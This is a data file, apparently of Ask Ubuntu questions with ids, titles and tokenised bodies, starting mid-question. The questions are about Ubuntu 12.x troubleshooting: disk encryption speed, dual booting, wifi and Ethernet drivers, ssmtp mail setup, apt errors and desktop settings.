timing cached reads : 14816 mb in 2.00 seconds = 7412.86 mb/sec timing buffered disk reads : 422 mb in 3.01 seconds = 140.11 mb/sec i also tried the experiment by looking at htop ... not sure how to interpret what i saw , since the i5 processor does hyper-threading , but 2 threads out of 4 where going to about 73 % of usage during the test , while the other 2 threads where left unused . indeed , if i start 2 processes that are reading with dd from 2 distinct files ( to prevent buffering ) , then iotop reports a total of approx 400 mb/s . so this definitely feels like it 's cpu-bound . my disappointment comes from the fact that my i5 processor is capable of aes-ni . unencrypted data is being read at over 500 mb/s using the same tests i did above . so we are talking about an encrypted partition being at least 3 times slower . i do n't really know if my dm-crypt install is using aes-ni . here 's the output of lsmod : # lsmod | grep aes aesni_intel 51038 35 cryptd 20404 10 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel here 's the output of cryptsetup : # cryptsetup status sda2_crypt /dev/mapper/sda2_crypt is active and is in use . type : luks1 cipher : aes-xts-plain64 keysize : 512 bits device : /dev/sda2 offset : 4096 sectors size : 249565184 sectors mode : read/write flags : discards so , is this expected ? should n't aes-ni improve things more than this ? also , how to disable aes-ni to see if there 's any difference ? and maybe i should enable it somehow , but have n't found any tips in my searches . thanks ,
246105	change alt-tab to ctrl-tab on ubuntu 12.04	all i have an apple usb keybord for my ubuntu 12.04 . i remaped command left key to control for convenience . and now i switch between apps with alt-tab and between tabs within one app with ctrl-tab . it 's normal but not comfortable and painless . it would be ideally to remap shortcuts as opposite : ctrl-tab - switching between apps , alt-tab - between tabs . can i do it ? xmodmap ? update : here is a screenshot of settings which i apply , restarted but it has n't changed :
246107	error while installing package - ubuntu 12.04	below is the error i am getting . when i install or upgrade , i have been struggling for a while to solve . sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic linux-generic-pae linux-headers-generic linux-headers-generic-pae linux-image-generic linux-image-generic-pae the following packages will be upgraded : bamfdaemon dpkg dpkg-dev duplicity libbamf0 libbamf3-0 libdpkg-perl libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglu1-mesa libpulse-mainloop-glib0 libpulse0 libpulsedsp libxatracker1 linux-libc-dev pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils x11-common xbase-clients xorg xserver-xorg xserver-xorg-input-all xserver-xorg-video-all 28 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . need to get 0 b/8,980 kb of archives . after this operation , 6,144 b of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... ( reading database ... dpkg : warning : files list file for package `libservlet2.5-java ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libnm-glib-vpn1 ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `network-manager ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libnm-glib4 ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `activity-log-manager-control-center ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libnm-util2 ' missing , assuming package has no files currently installed . ( reading database ... 50 % dpkg : unrecoverable fatal error , aborting : files list file for package 'libnspr4 ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 )
246108	ubuntu and debian & windows 8 loader	is it possible to use windows 8 loader to choose what i want to do next : to start windows 8 or to chainload grub with ubuntu and debian ? i have no uefi , so a master boot record is used i used a program that is called easybcd . it works , but using this program i get a dos-style loader ( black and white one which looks the same as win7 loader ) instead of the shiny blue win8 one . i have a desire to use windows 8 loader , not grub or win7-like loader . how to do this ? i have seen this screenshot , so i assume that this is possible : http : //tipsfromgeek.com/wp-content/uploads/2012/07/windows-8-triple-boot-with-windows-7-and-ubuntu.jpg
246111	re-map alt+drag in unity . i need it for inkscape	i need alt+drag for some of inkscape function , instead of just draggin my current window , how do i re-map `` drag window '' key to another shorcut ?
246113	can i install windows 8 along with already dual windows 7 & ubuntu 12.04 ? ? does it affects boot menu ?	i am already having dual boot windows 7 & ubuntu 12.04 in their dedicated hard disk space . windows 7 was installed in c drive firstly ( a dedicated space of 340gb for windows ) & then ubuntu was installed in its dedicated space of 125gb ( i have 500gb hard disk ) . now i want to install windows 8 in d drive of windows partition . does installation of windows 8 will affect my already setup dual boot os ? ? do i encounter any problem on startup boot menu ? ? pls help me i want windows 8 on my laptop.. 2nd gen core i5 processor , 6gb , 500gb , intel hd graphics
246114	reactivate touchpad two-finger-scroll on l430	i 'm just installing ubuntu 12.10. on my thinkpad l430 and the trackpoint did n't work . so i executed the workaround echo `` options psmouse proto=exps '' | sudo tee /etc/modprobe.d/trackpoint.conf and rebooted . unfortunately now the two-finger-scrolling on the touchpad does n't work any more . but i 'd prefer to use the touchpad scroll . could anybody give me a hint , how to reactivate the two-finger-scroll and deactivate the trackpoint again . thanks a lot !
246116	12.10 : ethernet device is not created on boot	i have a problem with my wired interface - an appropriate device for it is just not created at boot . what is strange about it is that it never gets enabled on boot , but is always created after a reboot . this behavior is persistent regardless of whether the carrier is present or not . thus the output of some commands after boot is as follows : commands like ls /sys/class/net or ifconfig -a only display lo and wifi interfaces . lshw -c network shows the following for the ethernet adapter : *-network unclaimed description : ethernet controller product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm msi cap_list configuration : latency=0 resources : memory : d0400000-d041ffff memory : d0428000-d0428fff ioport:3020 ( size=32 ) lsmod | grep e1000 shows the module is loaded : e1000e 199273 0 after a reboot all the above commands report everything is okay and the ethernet device is present . the only meaningful different i have found is in the output of dmesg | grep -e eth0 -e e100 : after boot ( no ethernet interface ) : [ 16.402581 ] e1000e : intel ( r ) pro/1000 network driver - 2.0.0-k [ 16.402583 ] e1000e : copyright ( c ) 1999 - 2012 intel corporation . [ 16.402622 ] e1000e 0000:00:19.0 : setting latency timer to 64 [ 16.402678 ] e1000e 0000:00:19.0 : interrupt throttling rate ( ints/sec ) set to dynamic conservative mode [ 16.402714 ] e1000e 0000:00:19.0 : irq 46 for msi/msi-x [ 16.409024 ] eth0 : broadcom bcm4727 802.11 hybrid wireless controller 5.100.82.112 [ 17.394622 ] e1000e : probe of 0000:00:19.0 failed with error -3 after reboot ( ethernet interface is present ) : [ 15.208741 ] e1000e : intel ( r ) pro/1000 network driver - 2.0.0-k [ 15.208743 ] e1000e : copyright ( c ) 1999 - 2012 intel corporation . [ 15.208777 ] e1000e 0000:00:19.0 : setting latency timer to 64 [ 15.208827 ] e1000e 0000:00:19.0 : interrupt throttling rate ( ints/sec ) set to dynamic conservative mode [ 15.208857 ] e1000e 0000:00:19.0 : irq 46 for msi/msi-x [ 15.293928 ] eth0 : broadcom bcm4727 802.11 hybrid wireless controller 5.100.82.112 [ 15.470050 ] e1000e 0000:00:19.0 : eth0 : ( pci express:2.5gt/s : width x1 ) 2c:76:8a : e5:46:79 [ 15.470055 ] e1000e 0000:00:19.0 : eth0 : intel ( r ) pro/1000 network connection [ 15.470103 ] e1000e 0000:00:19.0 : eth0 : mac : 10 , phy : 11 , pba no : ffffff-0ff [ 20.404379 ] e1000e 0000:00:19.0 : irq 46 for msi/msi-x [ 20.508146 ] e1000e 0000:00:19.0 : irq 46 for msi/msi-x what i have tried so far : compiling the latest version of the driver , that is available at intel support site ; installing sysfsutils so my /etc/sysfs.conf looks like this : devices/pci0000:00/0000:00:19.0/enable = 1 but neither has solved the problem . i have been googling for quite a while now , but have not found much useful information given my problem is so weird . any ideas will be highly appreciated . thanks !
246121	how do i make ubuntu request a specific ip address from a dhcp server ?	so here 's the deal . my router assigns ip addresses starting from 192.168.0.50 . i have a couple of computers running ubuntu which i want the router to assign 192.168.0.50 and 192.168.0.51 every time they request for an ip address . any ideas ? thanks in advance . : )
246122	where does compiz store its configuration in ubuntu 12.10 ?	according to http : //wiki.compiz.org/ccsm # line-108 , the settings could be saved at one of the following places : gconf kconf ( not applicable in a default ubuntu 12.10 installation i guess ) ini configuration file ( located in ~/.config/compiz/compizconfig ) in particular , i 'm looking for the unityshell plugin settings . e.g . the panel opacity . unfortunately , i have n't been able to find all of those settings . `` most '' settings seem to be present in gconf , in apps/compiz-1/plugins . but the unityshell plugin is n't present in that directory . the ~/.config/compiz/compizconfig/config file is present ( it seems to be automatically created when i start unity ) , but it remains empty . the ~/.compiz-1/metadata/unityshell.xml file seems to enumerate all options i 'm looking for , but those are the default values , probably not necessarily the active options . ~/.cache/compizconfig-1/*.pb seems to contain all options , but those are binary files , and since it 's a cache , i doubt this is compiz ' location to permanently store its configuration . dconf also showed a few compiz settings under org/compiz , but again , not everything . -- thanks in advance for the information !
246123	wireless not working in ubuntu 12.04	i came in to work today and , to my surprise , my wireless adapter does n't work anymore . after a very painful 2 hour search for solutions in the internet , i 'm here for help . my wireless board is a d-link dwa-525 ( 05:02.0 network controller : ralink corp. device 3040 ) and i have tried installing drivers from source and using ndiswrapper with the windows found on the cd that came with it . i 'm running ubuntu 12.04 with the 3.2.0-36-generic kernel . here 's the relevant portions of outputs i can think of , please let me know if anything else is needed : sudo lshw -c network *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 2 bus info : pci @ 0000:05:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 maxlatency=4 mingnt=2 resources : memory : f7f00000-f7f0ffff lsmod ( note that rt2800pci is n't loaded : i blacklisted it with sudo modprobe -b rt2800pci as a possible solution and could n't get it to load again on startup . i can load it manually , though . ) module size used by bnep 18281 2 rfcomm 47604 0 bluetooth 180104 10 bnep , rfcomm binfmt_misc 17540 1 vesafb 13844 1 snd_usb_audio 122982 2 snd_usbmidi_lib 25395 1 snd_usb_audio snd_seq_midi 13324 0 snd_hda_codec_via 51398 1 snd_rawmidi 30748 2 snd_usbmidi_lib , snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_hda_intel 33773 3 snd_hda_codec 127706 2 snd_hda_codec_via , snd_hda_intel snd_hwdep 13668 2 snd_usb_audio , snd_hda_codec snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd_pcm 97188 3 snd_usb_audio , snd_hda_intel , snd_hda_codec snd_timer 29990 2 snd_seq , snd_pcm snd 78855 21 snd_usb_audio , snd_usbmidi_lib , snd_hda_codec_via , snd_rawmidi , snd_seq , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_seq_device , snd_pcm , snd_timer soundcore 15091 1 snd mei 41616 0 i7core_edac 28102 0 ppdev 17113 0 edac_core 53746 3 i7core_edac snd_page_alloc 18529 2 snd_hda_intel , snd_pcm joydev 17693 0 psmouse 87692 0 serio_raw 13211 0 asus_atk0110 18078 0 mac_hid 13253 0 parport_pc 32866 1 lp 17799 0 parport 46562 3 ppdev , parport_pc , lp firewire_ohci 41000 0 firewire_core 63558 1 firewire_ohci usbhid 47199 0 uas 18180 0 usb_storage 49198 4 crc_itu_t 12707 1 firewire_core r8169 62099 0 hid 99559 1 usbhid pata_jmicron 12747 0 floppy 70365 0 georgebrindeiro @ r2d2 : /etc/modprobe.d $ ^c georgebrindeiro @ r2d2 : /etc/modprobe.d $ lsmod module size used by bnep 18281 2 rfcomm 47604 0 bluetooth 180104 10 bnep , rfcomm binfmt_misc 17540 1 vesafb 13844 1 snd_usb_audio 122982 2 snd_usbmidi_lib 25395 1 snd_usb_audio snd_seq_midi 13324 0 snd_hda_codec_via 51398 1 snd_rawmidi 30748 2 snd_usbmidi_lib , snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_hda_intel 33773 4 snd_hda_codec 127706 2 snd_hda_codec_via , snd_hda_intel snd_hwdep 13668 2 snd_usb_audio , snd_hda_codec snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd_pcm 97188 4 snd_usb_audio , snd_hda_intel , snd_hda_codec snd_timer 29990 2 snd_seq , snd_pcm snd 78855 22 snd_usb_audio , snd_usbmidi_lib , snd_hda_codec_via , snd_rawmidi , snd_seq , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_seq_device , snd_pcm , snd_timer soundcore 15091 1 snd mei 41616 0 i7core_edac 28102 0 ppdev 17113 0 edac_core 53746 3 i7core_edac snd_page_alloc 18529 2 snd_hda_intel , snd_pcm joydev 17693 0 psmouse 87692 0 serio_raw 13211 0 asus_atk0110 18078 0 mac_hid 13253 0 parport_pc 32866 1 lp 17799 0 parport 46562 3 ppdev , parport_pc , lp firewire_ohci 41000 0 firewire_core 63558 1 firewire_ohci usbhid 47199 0 uas 18180 0 usb_storage 49198 4 crc_itu_t 12707 1 firewire_core r8169 62099 0 hid 99559 1 usbhid pata_jmicron 12747 0 floppy 70365 0 dmesg | grep 05:02 [ 1.013062 ] pci 0000:05:02.0 : [ 1814:3040 ] type 0 class 0x000280 [ 1.013078 ] pci 0000:05:02.0 : reg 10 : [ mem 0xf7de0000-0xf7deffff ] [ 1.022924 ] pci 0000:05:02.0 : address space collision : [ mem 0xf7de0000-0xf7deffff ] conflicts with pci bus 0000:02 [ mem 0xf7d00000-0xf7dfffff ] [ 1.062013 ] pci 0000:05:02.0 : bar 0 : assigned [ mem 0xf7f00000-0xf7f0ffff ] [ 1.062017 ] pci 0000:05:02.0 : bar 0 : error updating ( 0xf7f00000 ! = 0xf7d00000 ) [ 1.062019 ] pci 0000:05:02.0 : bar 0 : set to [ mem 0xf7f00000-0xf7f0ffff ] ( pci address [ 0xf7f00000-0xf7f0ffff ] ) rfkill list all no output lspci -nn | grep 0280 05:02.0 network controller [ 0280 ] : ralink corp. device [ 1814:3040 ]
246125	how to reboot into ubuntu from microsoft windows without manually selecting the grub entry ?	this is the reverse question of how to reboot into windows from ubuntu ? . i 'm using a pc with windows/ubuntu dual system . the pc is shared with others , so the default boot system in grub is set to windows , and the timeout is 1 second . in order to switch the running windows to ubuntu , i have to reboot the windows and wait at the very short time of grub menu to choose the ubuntu entry . many times i had missed or forgotten the chance and the system booted to windows again . ( so i have to reboot again ) . is there a way to directly reboot the windows to ubuntu ? thanks !
246128	install ubuntu on blackberry bold mobile phone	can i install any ubuntu on a blackberry bold 9900 full touch mobile handset ? if so , how do i ? any help is greatly appreciated .
246132	does pantheon work without 3d acceleration ?	i installed pantheon de on my 12.04 laptop , which does n't support 3d acceleration but pantheon seems to do n't work . how can i make it work ?
246133	wifi randomly fails with broadcom bcm 4314	i just installed ubuntu 12.04lts ( 32 bit ) yesterday and firstly the wifi could n't seem to connect at all , then i went online and installed various things suggested and it finally connected . now it seems to work ok for a few hours then disconnect and not be able to reconnect . here 's the output for rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no here 's a screenshot of bcm drivers installed too : http : //imgfla.sh/tuc can anyone see what the issue could be ? thanks edit : lsmod output : http : //pastebin.com/z7x9rhh2
246136	internet connection problem in virtualbox	i have installed windows 7 in virtualbox . but i cant access internet . can you please tell me the way how can i connect to internet in virtualbox . internet is running smoothly in my host ubuntu..
246146	how can i permanently grant root access to a user ?	i 've been searching for the answer to this but all i find is `` it 's not a good idea '' or `` we do n't recommend it '' and some work around solution is given ... i am a new , yes . there is a good chance i could break stuff , i know . i am happy to break my os and format it many times if it comes to that but restrictions of any kind on my os enrage me . i want to be able to break stuff if i want , then learn how i broke it and how to fix it . i want the safety locks off . please tell me how to grant a user absolute authorisation .
246149	right-click on home folder in unity launcher does not populate the bookmark list	i installed ubuntu 12.04 and i also installed unity window quicklists by following this link . i added a few bookmarks ( shortcuts ) to the left side selection in nautilus : http : //naveenubuntu.blogspot.sk/2012/05/ubuntu-1204-adding-bookmarksshortcuts.html and this way , when i right-click the home folder in unity launcher it populates those shortcuts . but , as soon as i use a shortcut that way ( so i access a folder that way ) and then i right-click the home folder in the unity launcher ( even after i close the previously opened window ) the shortcuts do not appear anymore . only if i log out and log back in . could you , please , help me to solve this issue ? thank you in advance for all the efforts and answers .
246161	how to delete viruses in the ubuntu 12.10 in avg antivirus	i found viruses in the home folder , but i do n't know which command is used to delete viruses in ubuntu 12.10 using avg antivirus . can anyone tell me how to delete it ?
246164	install code : :blocks 12.11 on ubuntu	just downloaded the codeblocks .bz2 , extracted it and have a bunch of files which i dont know what to do with . a friend once showed me how to install it using the command line , but i cant remember how to do it . i think i used a package manager or something from the command line ? they are all .deb files . the solution is not to open them all using software center . installing this way destroys the os . anyone have any ideas ? thanks !
246166	wifi disconnects , wo n't reconnect ( 12.04 )	running fresh install of 12.04lts on lenovo b570e with bcm 4314 . wireless would n't connect at all at first , then a looked online for drivers and managed to get it working , it worked ok for a few hours and now it disconnects and keeps trying to reconnect but never does . rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no here 's lsmod output : http : //pastebin.com/z7x9rhh2 bcm drivers installed : http : //i.imgflash.com/tuc.png can anyone see what 's going wrong ?
246170	getting a lamp server secured and locked down for development	i 'm turning my vps into a development server which will hold development copies of all my websites , controlled by git . of course , i installed the lamp server so i can test them . i 've already configured apache to server through port 8080 . however i 'm trying to get it to be much more secure . the idea is to only allow certain people to view the content ( based on ip or password i guess ) . is there a way i can do this ? another thing i was trying to figure out is what to chown and chgrp all the files in /var/www to . by default ( at least in my case ) everything is owner by root -- which is bad news . what 's the best practise here ?
246177	deleting files from connected devices does n't free the device 's storage	a few weeks ago , i bought my tablet and copied files from my computer running ubuntu 12.04 . somehow , i had to delete some of these copied files to free some memory . but upon deletion from my computer , the memory of the ( supposed to be ) deleted files is still consumed . while the folders and files are already gone , they seem to be still consuming the device capacity . it happens with my memory card too , with a folder `` .trash-9999 '' when i reinsert it to my phone . how do i completely rid off the the deleted files from my tablet ? how do i do this without formatting the device partition ?
246178	is apparmor active after installation ?	i want to know is apparmor active after installing ubuntu12.04 ? thank you
246183	booting from the ubuntu server cd does n't start the installation process	i 'm trying to install ubuntu server on a laptop with core i5 intel processor and 4gb of memory . i do n't want any other os on it i want to use it as my personal server . the problem is when i boot form a cd with the .iso it just shows me a cursor in the left/top corner of the screen and the installation process does n't begin . i 've tried burning the cd on both a pc running ubuntu and a pc running windows but this has n't resolved the issue . any ideas ?
246189	system is shutting down instead of hibernating	i have an hp g4-1387 , core i5 , 4gb ram , 8gb swap and hybrid intel/ati graphics with ubuntu 12.04.1 lts . finally after installing amd catalyst 12.4 as described here i was able to suspend . hibernate and shutdown . with any other version superior to 12.4 my system hangs on shutdown , hibernating and suspending . now it works but i am not able to hibernate correctly . when i do it i see disk activity `` saving '' my data , but when i turn on my computer again i get login screen and everything is gone , the system seems to shutdown instead of hybernating . i use this to hibernate : sudo pm-hibernate my kernel version is 3.2.0-36-generic according to uname -r and i have plenty free swap when i try to hibernate ( almost all my 8gb ) . thank you very much for your help .
246196	nvidia geforce gt 540m drivers not working	i have upgraded my laptop to dual boot windows 8 and ubuntu 12.10 , which is fine and all , but i have been updating the drivers on the ubuntu side of things , but i have downloaded and executed nvidia-linux-x86_64-310.32.run from nvidia , which did n't work . i started to get this error message : and could only view the desktop in 640x480 which was n't enough to do anything . but then i tried following the instructions here , but it still has n't worked . can anyone give me a pointer in the right direction ?
246197	gnome window decorations missing in ubuntu 12.10	i just set up a new ubuntu 12.10 installation . the `` unity '' desktop seems to work fine , but when i switch to gnome , all the window decorations are missing , including the borders and the resize buttons . has anyone seen this before ? how do i fix it ?
246204	using windows 7 after ubuntu 12.1 restarts windows and signs me into a guest account	i have very little experience with ubuntu , and i just spent all weekend trying it out and installing it finally on my laptop . after i installed it and ran it for awhile because i could n't find my old files . so i restarted the computer in windows and it acted as if i had just started windows 7 for the first time . all of my programs were gone from the desktop , it reset the toolbar at the bottom and i lost my theme . it then tells me i 'm on a guest account and that all of my information will be lost when i turn it off . all of my data was on the hard drive though , so nothing was lost . is there a way i can keep my user data on windows 7 as well as ubuntu ? thank you for the help !
246207	no option for changing launcher placement in settings - > display	few days ago i encountered a problem with dual-monitor configuration in ubuntu - unwanted launcher bar on second monitor . the problem was reported here several times before . the solution for that is to change launcher placement option in settings > displays . however , while trying to do that i discovered that i have no such option ! i have enclosed screenshot as a proof . do you have any hints what should i do in order to `` reveal '' this option ? moreover - any guess what might have caused it to disappear ? i also put some additional information which may be helpful . after installation of ubuntu i have tried switching to gnome-shell . this went totally wrong and i ended up with semi-installed shell ( no titlebars etc. ) . in order to run unity i 'm forced to execute unity command twice . i have no idea how this could affect system settings - i 'm informing you just-in-case . output of lspci | grep vga : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) output of xrandr : screen 0 : minimum 320 x 200 , current 3360 x 1050 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1600x900 60.1 + 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1680x1050+1680+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 60.0*+ 1680x945 60.0 1400x1050 74.9 60.0 1600x900 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1366x768 60.0 1360x768 60.0 1280x800 74.9 59.8 1152x864 75.0 1280x768 74.9 59.9 1024x768 75.1 70.1 60.0 1024x576 60.0 800x600 72.2 75.0 60.3 56.2 848x480 60.0 640x480 72.8 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 59.9*+ 1680x945 60.0 1400x1050 74.9 59.9 1600x900 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1366x768 60.0 1360x768 60.0 1280x800 74.9 59.9 1152x864 75.0 1280x768 74.9 60.0 1024x768 75.1 70.1 60.0 1024x576 60.0 800x600 72.2 75.0 60.3 56.2 848x480 60.0 640x480 72.8 75.0 60.0 720x400 70.1 hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) that 's it . hopefully above outputs are sufficient . if not - let me know . warm regards . edit : this happens on newest version of ubuntu ( 12.10 ) .
246211	can not automatically start jira via init.d script	i am running atlassian jira on ubuntu 12.04 lts ( precise pangolin ) . i would like to automatically start jira whenever the system boots . for this purpose , i created script jira in /etc/init.d , similar to the one described in atlassian 's wiki . i can manually start / stop jira by calling /etc/init.d/jira accordingly . however , jira does not start during the boot process . in /var/log/boot.log i see messages like starting jira ... and jira started ... which i added in /etc/init.d/jira ; however , it seems that the java process does not survive the boot process as there is no java process after reboot . any idea why the java process does not outlive the boot process ? thanks , martin
246212	lvm mounted ubuntu 12.04 . no space left on device	i have a logical volume that is 2.44 tb in size which is mounted . i use it to store movies and tv shows for sharing on the home network . however , all of a sudden the system now gives the error : no space left on device , when trying to copy more data over . obviously , i checked using df -h and -i and both show free space and free nodes ! filesystem inodes iused ifree iuse % mounted on /dev/mapper/server-mediabox 163840000 15170 163824830 1 % /media/mediabox filesystem size used avail use % mounted on /dev/mapper/server-mediabox 2.5t 1.2t 1.2t 50 % /media/mediabox i do n't understand where this error is arising from ? please offer advice as i have looked everywhere online and ca n't seem to find a similar problem . thank you : )
246213	is there any app like virtual drive of farstone ?	is there any app like `` virtual drive '' of farstone ? we can use this app to create virtual cd/ dvd for playing without disks on cd/dvd drives .
246215	deleted metacity folder	i accidently deleted the folder responsible for keybindings , in gconf-editor it would be /apps/metacity/global_keybindings . i deleted the folder out of my home folder by accident . i 'm trying to set some keybindings , but ca n't because i do n't have access to that file anymore . how would i go about getting a default folder for that ? i would assume it would be as easy as placing a new folder there . any help is appreciated !
246217	how do i disable the `` cd as package '' source from the command line for ubuntu 12.04 lts server ?	i am trying to install or update software for ubuntu server 12.04 lts . i get this error : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/inrelease and other such lines . another user posted that this might be a problem if the cd is still referenced as a package . how do i remove the cd from the command line on a server ? thank you . mike m
246222	my ubuntu 12.10 can not update	i recently installed ubuntu 12.10 in my pc and all efforts to update the system have not been successful . the ubuntu software center can not open and every time i open the package manager i get an error message . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . '
246226	i login in ubuntu and just appears the mouse cursor	i have installed ubuntu in a virtualbox ( in windows ) . it works perfectly . after that , i tried to install it on the physical machine . when setup asked if i want to `` try '' or `` install '' , and i chose `` try '' , i was faced with a wallpaper and a mouse cursor but that 's it . nothing else happens after that . no desktop , no icons , nothing but the wallpaper and mouse cursor . if i install happens . what 's the problem ? i have a 1.80ghz processor , 2gb ram , 500gb hd , msi - r5450-md1gd3h/lp ( 1024mb ) .
246229	i am unable to use internet in no proxy mode	i am using ubuntu 10.04 ( installed using wubi in windows 7 ) and when i change my proxy settings to no proxy ( without any proxy server ) , i am unable to access any page ( using firefox or google chrome ) on the internet except for pages on our local intranet ( internal to iit kanpur ) i am a student of indian institute of technology kanpur ( iit kanpur ) . when i change my domain name servers from my default iitk ones ( mentioned below ) to google public dns ( 8.8.8.8 , 8.8.4.4 ) , i am able to access the internet normally . default ( iit kanpur recommended ) settings are : dns - 172.31.1.1 , 172.31.1.130 we are supposed to authenticate our identity before accessing pages other than the internal ones , say to access google ( iit kanpur uses a using fortigate firewall for this purpose ) if we are using no proxy server . and if wish , we can also use proxy servers ( like bsnlproxy.iitk.ac.in or ironport1.iitk.ac.in ) for accessing the internet . also , whenever i start using ubuntu initially after installation ( happened to me with ubuntu 12.04 also ) , i can access the internet normally for few days after which i notice that one by one all the websites are inaccessible via no-proxy . i am puzzled by this issue when i started using ubuntu after installation using wubi ( windows ubuntu installer ) from windows 7 , i noticed that i could use authenticate my identity and use the internet normally for a few days . afterwards , i started noticing that i am unable to access certain websites like wikipedia but could access google normally , and soon after this , i was unable to access any website outside our iit kanpur network even after authenticating the firewall ( page not found error ) . this surprised me . but i also noticed that i could always access the internet normally using any one of the proxy servers provided by iit kanpur . please note that i never face this problem when using the no proxy settings in my actual operating system i.e . windows 7 .
246231	ubuntu 12.10 network printing problems	i 've installed ubuntu 12.10 on my toshiba satellite c655 laptop intel core i3 and everything works fine . i just have a problem with my ethernet network printer ( ricoh ) . everytime i send something to print it actually sends it , but the result is just a blank page with some random numbers and letters at the top of the page and even if it is a one page document it keeps throwing blank pages until i kill the process from the printer , any suggestions ?
246236	compile and install rtl8192cu driver	can someone help me with this problem ? i am new to linux , so i do not know commands and i never did something like installing or compiling with command-line . i bought wifi adapter from edimax , model ew-7811un for my pc ( not laptop , so i do not have wifi card , only ethernet ) . when i go through guide on cd , i came across a version of kernel . it said i need version 2.6 , but i have 3.5.0-22-generic . i got errors like i do not have file or folder etc . can someone tell me where i can download compiled driver and where i need to put it ? or some other advice . i do n't want downgrade kernel when it is not necessary .
246237	configure ssmtp with gmail , in ubuntu 12.04 lts	i am trying to get my hands on a good command line email tool for ubuntu so that i can send simple emails may be even attach files through the terminal or simple bash scripts . my ssmtp.conf file looks something like this right now : # # config file for ssmtp sendmail # # the person who gets all mail for userids < 1000 # make this empty to disable rewriting . root=myusername @ gmail.com # the place where the mail goes . the actual machine name is required no # mx records are consulted . commonly mailhosts are named mail.domain.com mailhub=smtp.gmail.com:587 # where will the mail seem to come from ? rewritedomain=gmail.com # the full hostname hostname=myusername @ gmail.com authuser=myusername authpass=mypassword usestarttls=yes # are users allowed to set their own from : address ? # yes - allow the user to specify their own from : address # no - use the system generated from : address fromlineoverride=yes i also added alias in the revaliases file as follows : root : myusername @ gmail.com : smtp.gmail.com:587 localusername : myusername @ gmail.com : smtp.gmail.com:587 i am behind a proxy server which works when i set an automatic proxy configuration url and my system proxy settings are set according to the automatic proxy configuration url . however when i run ssmtp from terminal using : sudo ssmtp someone @ example.com hello world then pressing ctrl+d , i get : ssmtp : can not open smtp.gmail.com:587 the title is the question .
246240	how to use fixed width font in python indicator in unity 's top panel ?	i have a python script of network bandwidth indicator that i have downloaded from here : https : //launchpad.net/nettraffic i would like to make the indicator use a fixed font so that the indicator 's width in unity 's top panel wo n't change . how can i use a fixed-width font in there ?
246241	ubuntu 12.10 : package libc6-dev-i386 is not available	i 'm building 32 bit boost thread libraries on 32 bit ubuntu 12.10 . when building i get the error /usr/include/gnu/stubs.h:7:27 : error : gnu/stubs-32.h : no such file or directory i googled the problem and from reading this question it seems i need to install libc6-dev-i386 . however , when i run sudo apt-get install libc6-dev-i386 i get : package libc6-dev-i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libc6-dev-i386 ' has no installation candidate can anyone help me to locate this package ? edit , more info : i 'm not sure if this is relevant , but uname -m -p -i gives i686 i686 i686 . ls /usr/include/gnu/ gives libc-version.h lib-names.h option-groups.h stubs-64.h stubs.h . ls /usr/include/i386-linux-gnu/gnu gives libc-version.h lib-names.h option-groups.h stubs-32.h stubs.h . i added /usr/include/i386-linux-gnu to $ path but it did n't help , i still get the same error when trying to build the 32 bit boost thread libraries . more info : i 've now tried this with ubuntu 12.04 and i 'm getting exactly the same behaviour . with this install uname -i gives i386 .
246242	how to normalize sound in mp3 files	i am looking for a way to normalize the sound in many mp3 files i have . some have low sound , while others are louder so i have to turn the volume up or down depending on the song . what ways are there to do this for all files . i specially would like to do it via the terminal but gui ways are also accepted .
